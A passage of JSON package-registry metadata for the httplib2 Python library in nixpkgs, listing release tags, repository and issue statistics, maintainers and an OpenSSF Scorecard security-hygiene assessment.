tplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T07:23:52.239Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python312Packages.httplib2?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python312Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python312Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python312Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":5052,"html_url":null,"role":null,"created_at":"2026-03-08T06:18:47.950Z","updated_at":"2026-03-08T06:18:47.950Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":3380},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-08-25T05:04:34.674Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":13076420,"name":"python311Packages.httplib2","ecosystem":"nixpkgs","description":"Comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T17:32:51.813Z","latest_release_published_at":"2026-02-01T17:32:51.813Z","latest_release_number":"0.22.0","last_synced_at":"2026-04-09T20:00:19.699Z","created_at":"2026-02-01T17:32:39.412Z","updated_at":"2026-08-22T07:23:52.288Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=python311Packages.httplib2","install_command":"nix-env -iA nixpkgs.python311Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/development/python-modules/httplib2/default.nix#L73","metadata":{"nix_attribute":"python3.11-httplib2-0.22.0","position":"pkgs/development/python-modules/httplib2/default.nix:73","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using 